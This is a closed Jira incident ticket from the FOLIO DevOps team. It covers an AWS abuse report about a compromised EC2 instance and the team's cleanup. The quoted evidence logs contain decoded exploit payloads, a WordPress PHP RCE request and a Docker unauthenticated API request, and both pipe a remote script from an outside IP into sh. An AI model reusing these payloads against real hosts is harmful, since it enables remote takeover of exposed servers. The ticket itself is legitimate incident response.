[FOLIO-2642] carrier-io-restored AWS security incident: wordpress_php_rce, docker_unauth_rce Created: 11/Jun/20  Updated: 17/Jun/20  Resolved: 17/Jun/20

Status: Closed
Project: FOLIO
Components: None
Affects versions: None
Fix versions: None

Type: Task Priority: P1
Reporter: Peter Murray Assignee: John Malconian
Resolution: Done Votes: 0
Labels: security
Remaining Estimate: Not Specified
Time Spent: Not Specified
Original estimate: Not Specified

Sprint: DevOps: sprint 90
Development Team: FOLIO DevOps

 Description   

Hello,

We've received a report(s) that your AWS resource(s)

AWS ID: 732722833398 Region: us-east-1 EC2 Instance Id: i-0b5799b100760ae41 [3.93.19.104]

has been implicated in activity which resembles attempts to access remote hosts on the internet without authorization. Activity of this nature is forbidden in the AWS Acceptable Use Policy (https://aws.amazon.com/aup/). We've included the original report below for your review.

Please take action to stop the reported activity and reply directly to this email with details of the corrective actions you have taken. If you do not consider the activity described in these reports to be abusive, please reply to this email with details of your use case.

If you're unaware of this activity, it's possible that your environment has been compromised by an external attacker, or a vulnerability is allowing your machine to be used in a way that it was not intended.

We are unable to assist you with troubleshooting or technical inquiries. However, for guidance on securing your instance, we recommend reviewing the following resources:

If you require further assistance with this matter, you can take advantage of our developer forums:

https://forums.aws.amazon.com/index.jspa

Or, if you are subscribed to a Premium Support package, you may reach out for one-on-one assistance here:

https://console.aws.amazon.com/support/home#/case/create?issueType=technical

Please remember that you are responsible for ensuring that your instances and all applications are properly secured. If you require any further information to assist you in identifying or rectifying this issue, please let us know in a direct reply to this message.

Regards,
AWS Trust & Safety
Amazon Web Services, LLC

Case Number: 10688485529-1

Comments:
<<<
This is to inform you that the destination IP addresses listed in attached evidence logs have received unexpected network traffic with potentially harmful payloads from an EC2 instance with IP address of 3.93.19.104 (ec2-3-93-19-104.compute-1.amazonaws.com) during the timeframe 2020-06-10 17:54:43 GMT to 2020-06-10 18:39:40 GMT.

You may find attached the logs from destinations which receieved the unexpected network traffic. Please note that the payload field in attached evidece logs is base64 encoded and the content must be handled with security precautions required to analyze potentially harmful malware.
>>>

{
"traffic_start": "2020-06-10 17:54:43 GMT",
"traffic_end": "2020-06-10 18:39:40 GMT",
"source_ip": "3.93.19.104",
"source_rdns": "ec2-3-93-19-104.compute-1.amazonaws.com",
"destination_ips": [
"15.185.200.0",
"13.208.183.251"
],
"destination_ports": [
"80/tcp",
"2375/tcp"
],
"payload_classes": [
"exploit:gen/docker_unauth_rce",
"exploit:gen/wordpress_php_rce"
],
"traffic_logs": [
{
"timestamp": 1591814380,
"source_ip": "3.93.19.104",
"source_domain": "ec2-3-93-19-104.compute-1.amazonaws.com",
"destination_ip": "15.185.200.0",
"destination_port": 80,
"destination_service": "http",
"protocol": "tcp",
"payload_class": "exploit:gen/wordpress_php_rce",
"payload_data": "R0VUIC8/YT1mZXRjaCZjb250ZW50PTxwaHA+ZGllKHNoZWxsX2V4ZWMoImN1cmwlMjAyMTcuMTIuMjEwLjIwOS90Zi5zaHxzaCIpKTwvcGhwPiBIVFRQLzEuMQ0KaG9zdDogMTUuMTg1LjIwMC4wOjgwDQp1c2VyLWFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNzguMC4zOTA0LjEwOCBTYWZhcmkvNTM3LjM2DQpjb25uZWN0aW9uOiBjbG9zZQ0KYWNjZXB0LWVuY29kaW5nOiBnemlwDQoNCg=="
},
{
"timestamp": 1591811683,
"source_ip": "3.93.19.104",
"source_domain": "ec2-3-93-19-104.compute-1.amazonaws.com",
"destination_ip": "13.208.183.251",
"destination_port": 2375,
"destination_service": "docker",
"protocol": "tcp",
"payload_class": "exploit:gen/docker_unauth_rce",
"payload_data": "UE9TVCAvdjEuMjQvY29udGFpbmVycy9jcmVhdGUgSFRUUC8xLjENCmhvc3Q6IDEzLjIwOC4xODMuMjUxOjIzNzUNCnVzZXItYWdlbnQ6IEdvLWh0dHAtY2xpZW50LzEuMQ0KY29udGVudC1sZW5ndGg6IDQ2MA0KY29udGVudC10eXBlOiBhcHBsaWNhdGlvbi9qc29uDQphY2NlcHQtZW5jb2Rpbmc6IGd6aXANCg0KeyJIb3N0bmFtZSI6IiIsIkRvbWFpbm5hbWUiOiIiLCJVc2VyIjoiIiwiQXR0YWNoU3RkaW4iOmZhbHNlLCJBdHRhY2hTdGRvdXQiOmZhbHNlLCJBdHRhY2hTdGRlcnIiOmZhbHNlLCJUdHkiOmZhbHNlLCJPcGVuU3RkaW4iOmZhbHNlLCJTdGRpbk9uY2UiOmZhbHNlLCJFbnYiOm51bGwsIkNtZCI6bnVsbCwiSW1hZ2UiOiJ1YnVudHUiLCJWb2x1bWVzIjpudWxsLCJXb3JraW5nRGlyIjoiIiwiRW50cnlwb2ludCI6WyIvYmluL2Jhc2giLCItYyIsImFwdC1nZXQgdXBkYXRlIFx1MDAyNlx1MDAyNiBhcHQtZ2V0IGluc3RhbGwgLXkgd2dldCBjcm9uO3NlcnZpY2UgY3JvbiBzdGFydDsgd2dldCAtcSAtTyAtIDIxNy4xMi4yMTAuMjA5L2Quc2ggfCBzaDt0YWlsIC1mIC9kZXYvbnVsbCJdLCJPbkJ1aWxkIjpudWxsLCJMYWJlbHMiOm51bGwsIkhvc3RDb25maWciOm51bGwsIk5ldHdvcmtpbmdDb25maWciOm51bGx9Cg=="
}
]
}

wordpress_php_rce payload after base 64 decoding:

GET /?a=fetch&content=<php>die(shell_exec("curl%20217.12.210.209/tf.sh|sh"))</php> HTTP/1.1
host: 15.185.200.0:80
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
connection: close
accept-encoding: gzip

docker_unauth_rce payload after base 64 decoding:

POST /v1.24/containers/create HTTP/1.1
host: 13.208.183.251:2375
user-agent: Go-http-client/1.1
content-length: 460
content-type: application/json
accept-encoding: gzip

{"Hostname":"","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":null,"Image":"ubuntu","Volumes":null,"WorkingDir":"","Entrypoint":["/bin/bash","-c","apt-get update \u0026\u0026 apt-get install -y wget cron;service cron start; wget -q -O - 217.12.210.209/d.sh | sh;tail -f /dev/null"],"OnBuild":null,"Labels":null,"HostConfig":null,"NetworkingConfig":null}


 Comments   
Comment by Peter Murray [ 16/Jun/20 ]

John Malconian: Did you see the rather insistent follow-up email from AWS this morning? It seems like they want some kind of answer from us by email. Did you have a chance to clean up this server?

Comment by John Malconian [ 16/Jun/20 ]

Peter Murray The server is still running but traffic is not allowed in and out. I have an outstanding request from Martin to take a backup of the influx dbs before I completely shut it down. Haven't seen the email from AWS yet, but I'll respond.

Comment by John Malconian [ 16/Jun/20 ]

Sent response with our findings to AWS.

Comment by Peter Murray [ 16/Jun/20 ]

Thanks!

Comment by John Malconian [ 16/Jun/20 ]

I've taken influx db backups according to instructions from Martin and provided them to him via S3. The 'carrier-io-restored' has been terminated. I'm going to close this issue and follow up separately about a rebuild.

Generated at Thu Feb 08 23:22:10 UTC 2024 using Jira 1001.0.0-SNAPSHOT#100246-sha1:7a5c50119eb0633d306e14180817ddef5e80c75d.